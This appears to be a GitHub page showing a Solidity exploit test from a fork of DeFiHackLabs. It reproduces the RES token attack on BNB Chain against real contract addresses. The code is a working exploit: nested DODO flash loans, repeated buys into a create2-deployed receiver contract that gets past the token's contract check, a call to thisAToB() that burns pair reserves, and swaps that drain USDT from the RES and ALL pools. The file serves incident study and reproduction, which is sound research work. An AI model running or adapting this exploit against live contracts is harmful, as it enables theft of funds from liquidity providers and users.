forked from SunWeb3Sec/DeFiHackLabs
-
Notifications
You must be signed in to change notification settings - Fork 1
/
RES02_exp.sol
167 lines (144 loc) · 5.55 KB
/
RES02_exp.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./interface.sol";
interface IRES is IERC20{
function thisAToB() external;
}
// @Analysis
// https://twitter.com/BlockSecTeam/status/1578041521273962496
// @Contract address
// https://bscscan.com/address/0xeccd8b08ac3b587b7175d40fb9c60a20990f8d21#code
contract ReceiveToken{
constructor(){
IRES RES = IRES(0xecCD8B08Ac3B587B7175D40Fb9C60a20990F8D21);
IERC20 ALL = IERC20(0x04C0f31C0f59496cf195d2d7F1dA908152722DE7);
RES.approve(msg.sender, type(uint).max);
ALL.approve(msg.sender, type(uint).max);
selfdestruct(payable(msg.sender));
}
}
contract ContractTest is DSTest{
IERC20 USDT = IERC20(0x55d398326f99059fF775485246999027B3197955);
IRES RES = IRES(0xecCD8B08Ac3B587B7175D40Fb9C60a20990F8D21);
IERC20 ALL = IERC20(0x04C0f31C0f59496cf195d2d7F1dA908152722DE7);
IERC20 WBNB = IERC20(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c);
Uni_Router_V2 Router = Uni_Router_V2(0x10ED43C718714eb63d5aA57B78B54704E256024E);
Uni_Pair_V2 RESPair = Uni_Pair_V2(0x05ba2c512788bd95cd6D61D3109c53a14b01c82A);
Uni_Pair_V2 ALLPair = Uni_Pair_V2(0x1B214e38C5e861c56e12a69b6BAA0B45eFe5C8Eb);
address dodo = 0xD7B7218D778338Ea05f5Ecce82f86D365E25dBCE;
address dodo2 = 0x9ad32e3054268B849b84a8dBcC7c8f7c52E4e69A;
uint amount;
uint amount2;
address add;
CheatCodes cheats = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);
function setUp() public {
cheats.createSelectFork("bsc", 21948016);
}
function testExploit() public payable{
emit log_named_decimal_uint(
"[Start] Attacker USDT balance before exploit",
USDT.balanceOf(address(this)),
18
);
// use mint wbnb to mock flashLoan
address(WBNB).call{value: 30000 ether}("");
WBNBToUSDT();
uint USDTBefore = USDT.balanceOf(address(this));
emit log_named_decimal_uint(
"[Start] exchange USDT balance before exploit",
USDT.balanceOf(address(this)),
18
);
amount = USDT.balanceOf(dodo);
amount2 = USDT.balanceOf(dodo2);
USDT.approve(address(Router), type(uint).max);
RES.approve(address(Router), type(uint).max);
ALL.approve(address(Router), type(uint).max);
bytes memory bytecode = type(ReceiveToken).creationCode;
address _add;
assembly{
_add := create2(0, add(bytecode, 32), mload(bytecode), 0)
}
add = _add;
DVM(dodo2).flashLoan(0, amount2, address(this), new bytes(1));
uint USDTAfter = USDT.balanceOf(address(this));
emit log_named_decimal_uint(
"[End] RESPair USDT balance after exploit",
USDT.balanceOf(address(RESPair)),
18
);
emit log_named_decimal_uint(
"[End] ALLPair USDT balance after exploit",
USDT.balanceOf(address(ALLPair)),
18
);
emit log_named_decimal_uint(
"[End] Attacker USDT balance after exploit",
USDTAfter - USDTBefore,
18
);
}
function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) public{
if(msg.sender == dodo2){
DVM(dodo).flashLoan(0, amount, address(this), new bytes(1));
USDT.balanceOf(address(this));
USDT.transfer(dodo2, amount2);
}
else{
// get RES
uint amountBuy = USDT.balanceOf(address(this)) / 4;
buyRES(amountBuy);
buyRES(amountBuy);
buyRES(amountBuy);
buyRES(amountBuy);
// Burn RES in LP
RES.thisAToB();
// Sell RES , ALL
sellRES();
sellALL();
USDT.balanceOf(address(this));
USDT.transfer(address(dodo), amount);
}
}
function WBNBToUSDT() internal{
WBNB.approve(address(Router), type(uint).max);
address [] memory path = new address[](2);
path[0] = address(WBNB);
path[1] = address(USDT);
Router.swapExactTokensForTokensSupportingFeeOnTransferTokens(
WBNB.balanceOf(address(this)),
0,
path,
address(this),
block.timestamp
);
}
function buyRES(uint amountBuy) internal{
address [] memory path = new address[](2);
path[0] = address(USDT);
path[1] = address(RES);
Router.swapExactTokensForTokensSupportingFeeOnTransferTokens(
amountBuy,
0,
path,
// pass isContract(), the exploiter use EOA address in another contract, i guess he approve the contract in advance
add,
block.timestamp
);
}
function sellRES() internal{
(uint reserve0, uint reserve1, ) = RESPair.getReserves(); // USDT, RES
RES.transferFrom(add, address(RESPair), RES.balanceOf(add));
uint amountin = RES.balanceOf(address(RESPair)) - reserve1;
uint amountout = amountin * 9975 * reserve0 / (reserve1 * 10000 + amountin * 9975);
RESPair.swap(amountout, 0, address(this), "");
}
function sellALL() internal{
(uint reserve0, uint reserve1, ) = ALLPair.getReserves(); // ALL, USDT
ALL.transferFrom(add, address(ALLPair), ALL.balanceOf(add));
uint amountin = ALL.balanceOf(address(ALLPair)) - reserve0;
uint amountout = amountin * 9975 * reserve1 / (reserve0 * 10000 + amountin * 9975);
ALLPair.swap(0, amountout, address(this), "");
}
receive() external payable{}
}